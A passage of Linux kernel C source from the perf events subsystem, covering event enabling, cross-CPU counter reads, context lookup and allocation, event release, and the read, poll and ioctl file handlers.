__perf_event_mark_enabled(event);
return 1;
}
/*
* Enable all of a task's events that have been marked enable-on-exec.
* This expects task == current.
*/
static void perf_event_enable_on_exec(int ctxn)
{
struct perf_event_context *ctx, *clone_ctx = NULL;
enum event_type_t event_type = 0;
struct perf_cpu_context *cpuctx;
struct perf_event *event;
unsigned long flags;
int enabled = 0;
local_irq_save(flags);
ctx = current->perf_event_ctxp[ctxn];
if (!ctx || !ctx->nr_events)
goto out;
cpuctx = __get_cpu_context(ctx);
perf_ctx_lock(cpuctx, ctx);
ctx_sched_out(ctx, cpuctx, EVENT_TIME);
list_for_each_entry(event, &ctx->event_list, event_entry) {
enabled |= event_enable_on_exec(event, ctx);
event_type |= get_event_type(event);
}
/*
* Unclone and reschedule this context if we enabled any event.
*/
if (enabled) {
clone_ctx = unclone_ctx(ctx);
ctx_resched(cpuctx, ctx, event_type);
} else {
ctx_sched_in(ctx, cpuctx, EVENT_TIME, current);
}
perf_ctx_unlock(cpuctx, ctx);
out:
local_irq_restore(flags);
if (clone_ctx)
put_ctx(clone_ctx);
}
struct perf_read_data {
struct perf_event *event;
bool group;
int ret;
};
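/*
 * Pick the CPU to read @event from. If the event's group allows reading
 * from any CPU in the same package (PERF_EV_CAP_READ_ACTIVE_PKG), prefer
 * the local CPU to avoid a cross-package IPI.
 */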
static int __perf_event_read_cpu(struct perf_event *event, int event_cpu)
{
u16 local_pkg, event_pkg;
if (event->group_caps & PERF_EV_CAP_READ_ACTIVE_PKG) {
int local_cpu = smp_processor_id();
event_pkg = topology_physical_package_id(event_cpu);
local_pkg = topology_physical_package_id(local_cpu);
if (event_pkg == local_pkg)
return local_cpu;
}
return event_cpu;
}
/*
* Cross CPU call to read the hardware event
*/
static void __perf_event_read(void *info)
{
struct perf_read_data *data = info;
struct perf_event *sub, *event = data->event;
struct perf_event_context *ctx = event->ctx;
struct perf_cpu_context *cpuctx = __get_cpu_context(ctx);
struct pmu *pmu = event->pmu;
/*
* If this is a task context, we need to check whether it is
* the current task context of this cpu. If not it has been
* scheduled out before the smp call arrived. In that case
* event->count would have been updated to a recent sample
* when the event was scheduled out.
*/
if (ctx->task && cpuctx->task_ctx != ctx)
return;
raw_spin_lock(&ctx->lock);
if (ctx->is_active) {
update_context_time(ctx);
update_cgrp_time_from_event(event);
}
update_event_times(event);
if (event->state != PERF_EVENT_STATE_ACTIVE)
goto unlock;
if (!data->group) {
pmu->read(event);
data->ret = 0;
goto unlock;
}
pmu->start_txn(pmu, PERF_PMU_TXN_READ);
pmu->read(event);
list_for_each_entry(sub, &event->sibling_list, group_entry) {
update_event_times(sub);
if (sub->state == PERF_EVENT_STATE_ACTIVE) {
/*
* Use sibling's PMU rather than @event's since
* sibling could be on different (eg: software) PMU.
*/
sub->pmu->read(sub);
}
}
data->ret = pmu->commit_txn(pmu);
unlock:
raw_spin_unlock(&ctx->lock);
}
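/* Return the event count, preferring the PMU's own ::count() method. */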
static inline u64 perf_event_count(struct perf_event *event)
{
if (event->pmu->count)
return event->pmu->count(event);
return __perf_event_count(event);
}
/*
* NMI-safe method to read a local event, that is an event that
* is:
* - either for the current task, or for this CPU
 * - does not have inherit set, since inherited task events
* will not be local and we cannot read them atomically
* - must not have a pmu::count method
*/
u64 perf_event_read_local(struct perf_event *event)
{
unsigned long flags;
u64 val;
/*
* Disabling interrupts avoids all counter scheduling (context
* switches, timer based rotation and IPIs).
*/
local_irq_save(flags);
/* If this is a per-task event, it must be for current */
WARN_ON_ONCE((event->attach_state & PERF_ATTACH_TASK) &&
event->hw.target != current);
/* If this is a per-CPU event, it must be for this CPU */
WARN_ON_ONCE(!(event->attach_state & PERF_ATTACH_TASK) &&
event->cpu != smp_processor_id());
/*
* It must not be an event with inherit set, we cannot read
* all child counters from atomic context.
*/
WARN_ON_ONCE(event->attr.inherit);
/*
* It must not have a pmu::count method, those are not
* NMI safe.
*/
WARN_ON_ONCE(event->pmu->count);
/*
 * If the event is currently on this CPU, it's either a per-task event,
 * or local to this CPU. Furthermore it means it's ACTIVE (otherwise
* oncpu == -1).
*/
if (event->oncpu == smp_processor_id())
event->pmu->read(event);
val = local64_read(&event->count);
local_irq_restore(flags);
return val;
}
static int perf_event_read(struct perf_event *event, bool group)
{
int event_cpu, ret = 0;
/*
* If event is enabled and currently active on a CPU, update the
* value in the event structure:
*/
if (event->state == PERF_EVENT_STATE_ACTIVE) {
struct perf_read_data data = {
.event = event,
.group = group,
.ret = 0,
};
event_cpu = READ_ONCE(event->oncpu);
if ((unsigned)event_cpu >= nr_cpu_ids)
return 0;
preempt_disable();
event_cpu = __perf_event_read_cpu(event, event_cpu);
/*
* Purposely ignore the smp_call_function_single() return
* value.
*
* If event_cpu isn't a valid CPU it means the event got
* scheduled out and that will have updated the event count.
*
* Therefore, either way, we'll have an up-to-date event count
* after this.
*/
(void)smp_call_function_single(event_cpu, __perf_event_read, &data, 1);
preempt_enable();
ret = data.ret;
} else if (event->state == PERF_EVENT_STATE_INACTIVE) {
struct perf_event_context *ctx = event->ctx;
unsigned long flags;
raw_spin_lock_irqsave(&ctx->lock, flags);
/*
 * We may read while the context is not active
 * (e.g., the thread is blocked); in that case
 * we cannot update the context time.
*/
if (ctx->is_active) {
update_context_time(ctx);
update_cgrp_time_from_event(event);
}
if (group)
update_group_times(event);
else
update_event_times(event);
raw_spin_unlock_irqrestore(&ctx->lock, flags);
}
return ret;
}
/*
* Initialize the perf_event context in a task_struct:
*/
static void __perf_event_init_context(struct perf_event_context *ctx)
{
raw_spin_lock_init(&ctx->lock);
mutex_init(&ctx->mutex);
INIT_LIST_HEAD(&ctx->active_ctx_list);
INIT_LIST_HEAD(&ctx->pinned_groups);
INIT_LIST_HEAD(&ctx->flexible_groups);
INIT_LIST_HEAD(&ctx->event_list);
atomic_set(&ctx->refcount, 1);
}
static struct perf_event_context *
alloc_perf_context(struct pmu *pmu, struct task_struct *task)
{
struct perf_event_context *ctx;
ctx = kzalloc(sizeof(struct perf_event_context), GFP_KERNEL);
if (!ctx)
return NULL;
__perf_event_init_context(ctx);
if (task) {
ctx->task = task;
get_task_struct(task);
}
ctx->pmu = pmu;
return ctx;
}
static struct task_struct *
find_lively_task_by_vpid(pid_t vpid)
{
struct task_struct *task;
rcu_read_lock();
if (!vpid)
task = current;
else
task = find_task_by_vpid(vpid);
if (task)
get_task_struct(task);
rcu_read_unlock();
if (!task)
return ERR_PTR(-ESRCH);
return task;
}
/*
* Returns a matching context with refcount and pincount.
*/
static struct perf_event_context *
find_get_context(struct pmu *pmu, struct task_struct *task,
struct perf_event *event)
{
struct perf_event_context *ctx, *clone_ctx = NULL;
struct perf_cpu_context *cpuctx;
void *task_ctx_data = NULL;
unsigned long flags;
int ctxn, err;
int cpu = event->cpu;
if (!task) {
/* Must be root to operate on a CPU event: */
if (perf_paranoid_cpu() && !capable(CAP_SYS_ADMIN))
return ERR_PTR(-EACCES);
/*
 * We could be clever and allow attaching an event to an
* offline CPU and activate it when the CPU comes up, but
* that's for later.
*/
if (!cpu_online(cpu))
return ERR_PTR(-ENODEV);
cpuctx = per_cpu_ptr(pmu->pmu_cpu_context, cpu);
ctx = &cpuctx->ctx;
get_ctx(ctx);
++ctx->pin_count;
return ctx;
}
err = -EINVAL;
ctxn = pmu->task_ctx_nr;
if (ctxn < 0)
goto errout;
if (event->attach_state & PERF_ATTACH_TASK_DATA) {
task_ctx_data = kzalloc(pmu->task_ctx_size, GFP_KERNEL);
if (!task_ctx_data) {
err = -ENOMEM;
goto errout;
}
}
retry:
ctx = perf_lock_task_context(task, ctxn, &flags);
if (ctx) {
clone_ctx = unclone_ctx(ctx);
++ctx->pin_count;
if (task_ctx_data && !ctx->task_ctx_data) {
ctx->task_ctx_data = task_ctx_data;
task_ctx_data = NULL;
}
raw_spin_unlock_irqrestore(&ctx->lock, flags);
if (clone_ctx)
put_ctx(clone_ctx);
} else {
ctx = alloc_perf_context(pmu, task);
err = -ENOMEM;
if (!ctx)
goto errout;
if (task_ctx_data) {
ctx->task_ctx_data = task_ctx_data;
task_ctx_data = NULL;
}
err = 0;
mutex_lock(&task->perf_event_mutex);
/*
 * If it has already passed perf_event_exit_task(),
 * we must see PF_EXITING; it takes this mutex too.
*/
if (task->flags & PF_EXITING)
err = -ESRCH;
else if (task->perf_event_ctxp[ctxn])
err = -EAGAIN;
else {
get_ctx(ctx);
++ctx->pin_count;
rcu_assign_pointer(task->perf_event_ctxp[ctxn], ctx);
}
mutex_unlock(&task->perf_event_mutex);
if (unlikely(err)) {
put_ctx(ctx);
if (err == -EAGAIN)
goto retry;
goto errout;
}
}
kfree(task_ctx_data);
return ctx;
errout:
kfree(task_ctx_data);
return ERR_PTR(err);
}
static void perf_event_free_filter(struct perf_event *event);
static void perf_event_free_bpf_prog(struct perf_event *event);
static void free_event_rcu(struct rcu_head *head)
{
struct perf_event *event;
event = container_of(head, struct perf_event, rcu_head);
if (event->ns)
put_pid_ns(event->ns);
perf_event_free_filter(event);
kfree(event);
}
static void ring_buffer_attach(struct perf_event *event,
struct ring_buffer *rb);
static void detach_sb_event(struct perf_event *event)
{
struct pmu_event_list *pel = per_cpu_ptr(&pmu_sb_events, event->cpu);
raw_spin_lock(&pel->lock);
list_del_rcu(&event->sb_list);
raw_spin_unlock(&pel->lock);
}
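/*
 * A "side-band" event is a system-wide (non per-task, non-child) event that
 * asked for side-band records such as mmap, comm, task or context-switch
 * events; those events live on the per-CPU pmu_sb_events list.
 */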
static bool is_sb_event(struct perf_event *event)
{
struct perf_event_attr *attr = &event->attr;
if (event->parent)
return false;
if (event->attach_state & PERF_ATTACH_TASK)
return false;
if (attr->mmap || attr->mmap_data || attr->mmap2 ||
attr->comm || attr->comm_exec ||
attr->task ||
attr->context_switch)
return true;
return false;
}
static void unaccount_pmu_sb_event(struct perf_event *event)
{
if (is_sb_event(event))
detach_sb_event(event);
}
static void unaccount_event_cpu(struct perf_event *event, int cpu)
{
if (event->parent)
return;
if (is_cgroup_event(event))
atomic_dec(&per_cpu(perf_cgroup_events, cpu));
}
#ifdef CONFIG_NO_HZ_FULL
static DEFINE_SPINLOCK(nr_freq_lock);
#endif
static void unaccount_freq_event_nohz(void)
{
#ifdef CONFIG_NO_HZ_FULL
spin_lock(&nr_freq_lock);
if (atomic_dec_and_test(&nr_freq_events))
tick_nohz_dep_clear(TICK_DEP_BIT_PERF_EVENTS);
spin_unlock(&nr_freq_lock);
#endif
}
static void unaccount_freq_event(void)
{
if (tick_nohz_full_enabled())
unaccount_freq_event_nohz();
else
atomic_dec(&nr_freq_events);
}
static void unaccount_event(struct perf_event *event)
{
bool dec = false;
if (event->parent)
return;
if (event->attach_state & PERF_ATTACH_TASK)
dec = true;
if (event->attr.mmap || event->attr.mmap_data)
atomic_dec(&nr_mmap_events);
if (event->attr.comm)
atomic_dec(&nr_comm_events);
if (event->attr.task)
atomic_dec(&nr_task_events);
if (event->attr.freq)
unaccount_freq_event();
if (event->attr.context_switch) {
dec = true;
atomic_dec(&nr_switch_events);
}
if (is_cgroup_event(event))
dec = true;
if (has_branch_stack(event))
dec = true;
if (dec) {
if (!atomic_add_unless(&perf_sched_count, -1, 1))
schedule_delayed_work(&perf_sched_work, HZ);
}
unaccount_event_cpu(event, event->cpu);
unaccount_pmu_sb_event(event);
}
static void perf_sched_delayed(struct work_struct *work)
{
mutex_lock(&perf_sched_mutex);
if (atomic_dec_and_test(&perf_sched_count))
static_branch_disable(&perf_sched_events);
mutex_unlock(&perf_sched_mutex);
}
/*
* The following implement mutual exclusion of events on "exclusive" pmus
* (PERF_PMU_CAP_EXCLUSIVE). Such pmus can only have one event scheduled
* at a time, so we disallow creating events that might conflict, namely:
*
* 1) cpu-wide events in the presence of per-task events,
* 2) per-task events in the presence of cpu-wide events,
* 3) two matching events on the same context.
*
* The former two cases are handled in the allocation path (perf_event_alloc(),
* _free_event()), the latter -- before the first perf_install_in_context().
*/
static int exclusive_event_init(struct perf_event *event)
{
struct pmu *pmu = event->pmu;
if (!(pmu->capabilities & PERF_PMU_CAP_EXCLUSIVE))
return 0;
/*
* Prevent co-existence of per-task and cpu-wide events on the
* same exclusive pmu.
*
* Negative pmu::exclusive_cnt means there are cpu-wide
* events on this "exclusive" pmu, positive means there are
* per-task events.
*
* Since this is called in perf_event_alloc() path, event::ctx
* doesn't exist yet; it is, however, safe to use PERF_ATTACH_TASK
* to mean "per-task event", because unlike other attach states it
* never gets cleared.
*/
if (event->attach_state & PERF_ATTACH_TASK) {
if (!atomic_inc_unless_negative(&pmu->exclusive_cnt))
return -EBUSY;
} else {
if (!atomic_dec_unless_positive(&pmu->exclusive_cnt))
return -EBUSY;
}
return 0;
}
static void exclusive_event_destroy(struct perf_event *event)
{
struct pmu *pmu = event->pmu;
if (!(pmu->capabilities & PERF_PMU_CAP_EXCLUSIVE))
return;
/* see comment in exclusive_event_init() */
if (event->attach_state & PERF_ATTACH_TASK)
atomic_dec(&pmu->exclusive_cnt);
else
atomic_inc(&pmu->exclusive_cnt);
}
static bool exclusive_event_match(struct perf_event *e1, struct perf_event *e2)
{
if ((e1->pmu == e2->pmu) &&
(e1->cpu == e2->cpu ||
e1->cpu == -1 ||
e2->cpu == -1))
return true;
return false;
}
/* Called under the same ctx::mutex as perf_install_in_context() */
static bool exclusive_event_installable(struct perf_event *event,
struct perf_event_context *ctx)
{
struct perf_event *iter_event;
struct pmu *pmu = event->pmu;
if (!(pmu->capabilities & PERF_PMU_CAP_EXCLUSIVE))
return true;
list_for_each_entry(iter_event, &ctx->event_list, event_entry) {
if (exclusive_event_match(iter_event, event))
return false;
}
return true;
}
static void perf_addr_filters_splice(struct perf_event *event,
struct list_head *head);
static void _free_event(struct perf_event *event)
{
irq_work_sync(&event->pending);
unaccount_event(event);
if (event->rb) {
/*
* Can happen when we close an event with re-directed output.
*
* Since we have a 0 refcount, perf_mmap_close() will skip
* over us; possibly making our ring_buffer_put() the last.
*/
mutex_lock(&event->mmap_mutex);
ring_buffer_attach(event, NULL);
mutex_unlock(&event->mmap_mutex);
}
if (is_cgroup_event(event))
perf_detach_cgroup(event);
if (!event->parent) {
if (event->attr.sample_type & PERF_SAMPLE_CALLCHAIN)
put_callchain_buffers();
}
perf_event_free_bpf_prog(event);
perf_addr_filters_splice(event, NULL);
kfree(event->addr_filters_offs);
if (event->destroy)
event->destroy(event);
if (event->ctx)
put_ctx(event->ctx);
exclusive_event_destroy(event);
module_put(event->pmu->module);
call_rcu(&event->rcu_head, free_event_rcu);
}
/*
* Used to free events which have a known refcount of 1, such as in error paths
* where the event isn't exposed yet and inherited events.
*/
static void free_event(struct perf_event *event)
{
if (WARN(atomic_long_cmpxchg(&event->refcount, 1, 0) != 1,
"unexpected event refcount: %ld; ptr=%p\n",
atomic_long_read(&event->refcount), event)) {
/* leak to avoid use-after-free */
return;
}
_free_event(event);
}
/*
* Remove user event from the owner task.
*/
static void perf_remove_from_owner(struct perf_event *event)
{
struct task_struct *owner;
rcu_read_lock();
/*
* Matches the smp_store_release() in perf_event_exit_task(). If we
* observe !owner it means the list deletion is complete and we can
* indeed free this event, otherwise we need to serialize on
* owner->perf_event_mutex.
*/
owner = lockless_dereference(event->owner);
if (owner) {
/*
* Since delayed_put_task_struct() also drops the last
* task reference we can safely take a new reference
* while holding the rcu_read_lock().
*/
get_task_struct(owner);
}
rcu_read_unlock();
if (owner) {
/*
* If we're here through perf_event_exit_task() we're already
* holding ctx->mutex which would be an inversion wrt. the
* normal lock order.
*
 * However we can safely take this lock because it's the child
* ctx->mutex.
*/
mutex_lock_nested(&owner->perf_event_mutex, SINGLE_DEPTH_NESTING);
/*
* We have to re-check the event->owner field, if it is cleared
* we raced with perf_event_exit_task(), acquiring the mutex
* ensured they're done, and we can proceed with freeing the
* event.
*/
if (event->owner) {
list_del_init(&event->owner_entry);
smp_store_release(&event->owner, NULL);
}
mutex_unlock(&owner->perf_event_mutex);
put_task_struct(owner);
}
}
static void put_event(struct perf_event *event)
{
if (!atomic_long_dec_and_test(&event->refcount))
return;
_free_event(event);
}
/*
* Kill an event dead; while event:refcount will preserve the event
* object, it will not preserve its functionality. Once the last 'user'
* gives up the object, we'll destroy the thing.
*/
int perf_event_release_kernel(struct perf_event *event)
{
struct perf_event_context *ctx = event->ctx;
struct perf_event *child, *tmp;
/*
* If we got here through err_file: fput(event_file); we will not have
* attached to a context yet.
*/
if (!ctx) {
WARN_ON_ONCE(event->attach_state &
(PERF_ATTACH_CONTEXT|PERF_ATTACH_GROUP));
goto no_ctx;
}
if (!is_kernel_event(event))
perf_remove_from_owner(event);
ctx = perf_event_ctx_lock(event);
WARN_ON_ONCE(ctx->parent_ctx);
perf_remove_from_context(event, DETACH_GROUP);
raw_spin_lock_irq(&ctx->lock);
/*
 * Mark this event as STATE_DEAD; there is no external reference to it
* anymore.
*
* Anybody acquiring event->child_mutex after the below loop _must_
* also see this, most importantly inherit_event() which will avoid
* placing more children on the list.
*
* Thus this guarantees that we will in fact observe and kill _ALL_
* child events.
*/
event->state = PERF_EVENT_STATE_DEAD;
raw_spin_unlock_irq(&ctx->lock);
perf_event_ctx_unlock(event, ctx);
again:
mutex_lock(&event->child_mutex);
list_for_each_entry(child, &event->child_list, child_list) {
/*
* Cannot change, child events are not migrated, see the
* comment with perf_event_ctx_lock_nested().
*/
ctx = lockless_dereference(child->ctx);
/*
* Since child_mutex nests inside ctx::mutex, we must jump
* through hoops. We start by grabbing a reference on the ctx.
*
* Since the event cannot get freed while we hold the
* child_mutex, the context must also exist and have a !0
* reference count.
*/
get_ctx(ctx);
/*
* Now that we have a ctx ref, we can drop child_mutex, and
* acquire ctx::mutex without fear of it going away. Then we
* can re-acquire child_mutex.
*/
mutex_unlock(&event->child_mutex);
mutex_lock(&ctx->mutex);
mutex_lock(&event->child_mutex);
/*
* Now that we hold ctx::mutex and child_mutex, revalidate our
 * state; if the child is still the first entry, it didn't get freed
* and we can continue doing so.
*/
tmp = list_first_entry_or_null(&event->child_list,
struct perf_event, child_list);
if (tmp == child) {
perf_remove_from_context(child, DETACH_GROUP);
list_del(&child->child_list);
free_event(child);
/*
* This matches the refcount bump in inherit_event();
* this can't be the last reference.
*/
put_event(event);
}
mutex_unlock(&event->child_mutex);
mutex_unlock(&ctx->mutex);
put_ctx(ctx);
goto again;
}
mutex_unlock(&event->child_mutex);
no_ctx:
put_event(event); /* Must be the 'last' reference */
return 0;
}
EXPORT_SYMBOL_GPL(perf_event_release_kernel);
/*
* Called when the last reference to the file is gone.
*/
static int perf_release(struct inode *inode, struct file *file)
{
perf_event_release_kernel(file->private_data);
return 0;
}
u64 perf_event_read_value(struct perf_event *event, u64 *enabled, u64 *running)
{
struct perf_event *child;
u64 total = 0;
*enabled = 0;
*running = 0;
mutex_lock(&event->child_mutex);
(void)perf_event_read(event, false);
total += perf_event_count(event);
*enabled += event->total_time_enabled +
atomic64_read(&event->child_total_time_enabled);
*running += event->total_time_running +
atomic64_read(&event->child_total_time_running);
list_for_each_entry(child, &event->child_list, child_list) {
(void)perf_event_read(child, false);
total += perf_event_count(child);
*enabled += child->total_time_enabled;
*running += child->total_time_running;
}
mutex_unlock(&event->child_mutex);
return total;
}
EXPORT_SYMBOL_GPL(perf_event_read_value);
static int __perf_read_group_add(struct perf_event *leader,
u64 read_format, u64 *values)
{
struct perf_event *sub;
int n = 1; /* skip @nr */
int ret;
ret = perf_event_read(leader, true);
if (ret)
return ret;
/*
* Since we co-schedule groups, {enabled,running} times of siblings
* will be identical to those of the leader, so we only publish one
* set.
*/
if (read_format & PERF_FORMAT_TOTAL_TIME_ENABLED) {
values[n++] += leader->total_time_enabled +
atomic64_read(&leader->child_total_time_enabled);
}
if (read_format & PERF_FORMAT_TOTAL_TIME_RUNNING) {
values[n++] += leader->total_time_running +
atomic64_read(&leader->child_total_time_running);
}
/*
* Write {count,id} tuples for every sibling.
*/
values[n++] += perf_event_count(leader);
if (read_format & PERF_FORMAT_ID)
values[n++] = primary_event_id(leader);
list_for_each_entry(sub, &leader->sibling_list, group_entry) {
values[n++] += perf_event_count(sub);
if (read_format & PERF_FORMAT_ID)
values[n++] = primary_event_id(sub);
}
return 0;
}
static int perf_read_group(struct perf_event *event,
u64 read_format, char __user *buf)
{
struct perf_event *leader = event->group_leader, *child;
struct perf_event_context *ctx = leader->ctx;
int ret;
u64 *values;
lockdep_assert_held(&ctx->mutex);
values = kzalloc(event->read_size, GFP_KERNEL);
if (!values)
return -ENOMEM;
values[0] = 1 + leader->nr_siblings;
/*
* By locking the child_mutex of the leader we effectively
 * lock the child list of all siblings. XXX explain how.
*/
mutex_lock(&leader->child_mutex);
ret = __perf_read_group_add(leader, read_format, values);
if (ret)
goto unlock;
list_for_each_entry(child, &leader->child_list, child_list) {
ret = __perf_read_group_add(child, read_format, values);
if (ret)
goto unlock;
}
mutex_unlock(&leader->child_mutex);
ret = event->read_size;
if (copy_to_user(buf, values, event->read_size))
ret = -EFAULT;
goto out;
unlock:
mutex_unlock(&leader->child_mutex);
out:
kfree(values);
return ret;
}
static int perf_read_one(struct perf_event *event,
u64 read_format, char __user *buf)
{
u64 enabled, running;
u64 values[4];
int n = 0;
values[n++] = perf_event_read_value(event, &enabled, &running);
if (read_format & PERF_FORMAT_TOTAL_TIME_ENABLED)
values[n++] = enabled;
if (read_format & PERF_FORMAT_TOTAL_TIME_RUNNING)
values[n++] = running;
if (read_format & PERF_FORMAT_ID)
values[n++] = primary_event_id(event);
if (copy_to_user(buf, values, n * sizeof(u64)))
return -EFAULT;
return n * sizeof(u64);
}
static bool is_event_hup(struct perf_event *event)
{
bool no_children;
if (event->state > PERF_EVENT_STATE_EXIT)
return false;
mutex_lock(&event->child_mutex);
no_children = list_empty(&event->child_list);
mutex_unlock(&event->child_mutex);
return no_children;
}
/*
* Read the performance event - simple non blocking version for now
*/
static ssize_t
__perf_read(struct perf_event *event, char __user *buf, size_t count)
{
u64 read_format = event->attr.read_format;
int ret;
/*
 * Return end-of-file for a read on an event that is in
* error state (i.e. because it was pinned but it couldn't be
* scheduled on to the CPU at some point).
*/
if (event->state == PERF_EVENT_STATE_ERROR)
return 0;
if (count < event->read_size)
return -ENOSPC;
WARN_ON_ONCE(event->ctx->parent_ctx);
if (read_format & PERF_FORMAT_GROUP)
ret = perf_read_group(event, read_format, buf);
else
ret = perf_read_one(event, read_format, buf);
return ret;
}
static ssize_t
perf_read(struct file *file, char __user *buf, size_t count, loff_t *ppos)
{
struct perf_event *event = file->private_data;
struct perf_event_context *ctx;
int ret;
ctx = perf_event_ctx_lock(event);
ret = __perf_read(event, buf, count);
perf_event_ctx_unlock(event, ctx);
return ret;
}
static unsigned int perf_poll(struct file *file, poll_table *wait)
{
struct perf_event *event = file->private_data;
struct ring_buffer *rb;
unsigned int events = POLLHUP;
poll_wait(file, &event->waitq, wait);
if (is_event_hup(event))
return events;
/*
* Pin the event->rb by taking event->mmap_mutex; otherwise
* perf_event_set_output() can swizzle our rb and make us miss wakeups.
*/
mutex_lock(&event->mmap_mutex);
rb = event->rb;
if (rb)
events = atomic_xchg(&rb->poll, 0);
mutex_unlock(&event->mmap_mutex);
return events;
}
static void _perf_event_reset(struct perf_event *event)
{
(void)perf_event_read(event, false);
local64_set(&event->count, 0);
perf_event_update_userpage(event);
}
/*
* Holding the top-level event's child_mutex means that any
* descendant process that has inherited this event will block
* in perf_event_exit_event() if it goes to exit, thus satisfying the
* task existence requirements of perf_event_enable/disable.
*/
static void perf_event_for_each_child(struct perf_event *event,
void (*func)(struct perf_event *))
{
struct perf_event *child;
WARN_ON_ONCE(event->ctx->parent_ctx);
mutex_lock(&event->child_mutex);
func(event);
list_for_each_entry(child, &event->child_list, child_list)
func(child);
mutex_unlock(&event->child_mutex);
}
static void perf_event_for_each(struct perf_event *event,
void (*func)(struct perf_event *))
{
struct perf_event_context *ctx = event->ctx;
struct perf_event *sibling;
lockdep_assert_held(&ctx->mutex);
event = event->group_leader;
perf_event_for_each_child(event, func);
list_for_each_entry(sibling, &event->sibling_list, group_entry)
perf_event_for_each_child(sibling, func);
}
static void __perf_event_period(struct perf_event *event,
struct perf_cpu_context *cpuctx,
struct perf_event_context *ctx,
void *info)
{
u64 value = *((u64 *)info);
bool active;
if (event->attr.freq) {
event->attr.sample_freq = value;
} else {
event->attr.sample_period = value;
event->hw.sample_period = value;
}
active = (event->state == PERF_EVENT_STATE_ACTIVE);
if (active) {
perf_pmu_disable(ctx->pmu);
/*
* We could be throttled; unthrottle now to avoid the tick
* trying to unthrottle while we already re-started the event.
*/
if (event->hw.interrupts == MAX_INTERRUPTS) {
event->hw.interrupts = 0;
perf_log_throttle(event, 1);
}
event->pmu->stop(event, PERF_EF_UPDATE);
}
local64_set(&event->hw.period_left, 0);
if (active) {
event->pmu->start(event, PERF_EF_RELOAD);
perf_pmu_enable(ctx->pmu);
}
}
static int perf_event_period(struct perf_event *event, u64 __user *arg)
{
u64 value;
if (!is_sampling_event(event))
return -EINVAL;
if (copy_from_user(&value, arg, sizeof(value)))
return -EFAULT;
if (!value)
return -EINVAL;
if (event->attr.freq && value > sysctl_perf_event_sample_rate)
return -EINVAL;
event_function_call(event, __perf_event_period, &value);
return 0;
}
static const struct file_operations perf_fops;
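/* Resolve @fd into *@p, accepting only perf event files. */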
static inline int perf_fget_light(int fd, struct fd *p)
{
struct fd f = fdget(fd);
if (!f.file)
return -EBADF;
if (f.file->f_op != &perf_fops) {
fdput(f);
return -EBADF;
}
*p = f;
return 0;
}
static int perf_event_set_output(struct perf_event *event,
struct perf_event *output_event);
static int perf_event_set_filter(struct perf_event *event, void __user *arg);
static int perf_event_set_bpf_prog(struct perf_event *event, u32 prog_fd);
static long _perf_ioctl(struct perf_event *event, unsigned int cmd, unsigned long arg)
{
void (*func)(struct perf_event *);
u32 flags = arg;
switch (cmd) {
case PERF_EVENT_IOC_ENABLE:
func = _perf_event_enable;
break;
case PERF_EVENT_IOC_DISABLE:
func = _perf_event_disable;
break;
case PERF_EVENT_IOC_RESET:
func = _perf_event_reset;
break;
case PERF_EVENT_IOC_REFRESH:
return _perf_event_refresh(event, arg);
case PERF_EVENT_IOC_PERIOD:
return perf_event_period(event, (u64 __user *)arg);
case PERF_EVENT_IOC_ID:
{
u64 id = primary_event_id(event);
if (copy_to_user((void __user *)arg, &id, sizeof(id)))
return -EFAULT;
return 0;
}
case PERF_EVENT_IOC_SET_OUTPUT:
{
int ret;
if (arg != -1) {
struct perf_event *output_event;
struct fd output;
ret = perf_fget_light(arg, &output);
if (ret)
return ret;
output_event = output.file->private_data;
ret = perf_event_set_output(event, output_event);
fdput(output);
} else {
ret = perf_event_set_output(event, NULL);
}
return ret;
}
case PERF_EVENT_IOC_SET_FILTER:
return perf_event_set_filter(event, (void __user *)arg);
case PERF_EVENT_IOC_SET_BPF:
return perf_event_set_bpf_prog(event, arg);
case PERF_EVENT_IOC_PAUSE_OUTPUT: {
struct ring_buffer *rb;
rcu_read_lock();
rb = rcu_dereference(event->rb);
if (!rb || !rb->nr_pages) {
rcu_read_unlock();
return -EINVAL;
}
rb_toggle_paused(rb, !!arg);
rcu_read_unlock();
return 0;
}
default:
return -ENOTTY;
}
if (flags & PERF_IOC_FLAG_GROUP)
perf_event_for_each(event, func);
else
perf_event_for_each_child(event, func);
return 0;
}
static long perf_ioctl(struct file *file, unsigned int cmd, unsigned long arg)
{
struct perf_event *event = file->private_data;
struct perf_event_context *ctx;
long ret;
ctx = perf_event_ctx_lock(event);
ret = _perf_ioctl(event, cmd, arg);
perf_event_ctx_unlock(event, ctx);
return ret;
}
#ifdef CONFIG_COMPAT
static long perf_compat_ioctl(struct file *file, unsigned int cmd,
unsigned long arg)
{
switch (_IOC_NR(cmd)) {
case _IOC_NR(PERF_EVENT_IOC_SET_FILTER):
case _IOC_NR(PERF_EVENT_IOC_ID):
/* Fix up pointer size (usually 4 -> 8 in the 32-on-64-bit case) */
if (_IOC_SIZE(cmd) == sizeof(compat_uptr_t)) {
cmd &= ~IOCSIZE_MASK;
cmd |= sizeof(void *) << IOCSIZE_SHIFT;
}
break;
}
return perf_ioctl(file, cmd, arg);
}
#else
# define perf_compat_ioctl NULL
#endif
int perf_event_task_enable(void)
{
struct perf_event_context *ctx;
struct perf_event *event;
	mutex_lock(&current->perf_event_mutex);
	list_for_each_entry(event, &current->perf_event_list, owner_entry) {
ctx = perf_event_ctx_lock(event);
perf_event_for_each_child(event, _perf_event_enable);
perf_event_ctx_unlock(event, ctx);
}
	mutex_unlock(&current->perf_event_mutex);
return 0;
}
int perf_event_task_disable(void)
{
struct perf_event_context *ctx;
struct perf_event *event;
	mutex_lock(&current->perf_event_mutex);
	list_for_each_entry(event, &current->perf_event_list, owner_entry) {
ctx = perf_event_ctx_lock(event);
perf_event_for_each_child(event, _perf_event_disable);
perf_event_ctx_unlock(event, ctx);
}
	mutex_unlock(&current->perf_event_mutex);
return 0;
}
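/*
 * Hardware counter index as exported in the user-space mmap page;
 * 0 means the event is not currently active on a counter.
 */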
static int perf_event_index(struct perf_event *event)
{
if (event->hw.state & PERF_HES_STOPPED)
return 0;
if (event->state != PERF_EVENT_STATE_ACTIVE)
return 0;
return event->pmu->event_idx(event);
}
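/*
 * NMI-safe snapshot of the enabled/running times, based on the shadow
 * context time recorded when the event was last scheduled in.
 */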
static void calc_timer_values(struct perf_event *event,
u64 *now,
u64 *enabled,
u64 *running)
{
u64 ctx_time;
*now = perf_clock();
ctx_time = event->shadow_ctx_time + *now;
*enabled = ctx_time - event->tstamp_enabled;
*running = ctx_time - event->tstamp_running;
}
static void perf_event_init_userpage(struct perf_event *event)
{
struct perf_event_mmap_page *userpg;
struct ring_buffer *rb;
rcu_read_lock();
rb = rcu_dereference(event->rb);
if (!rb)
goto unlock;
userpg = rb->user_page;
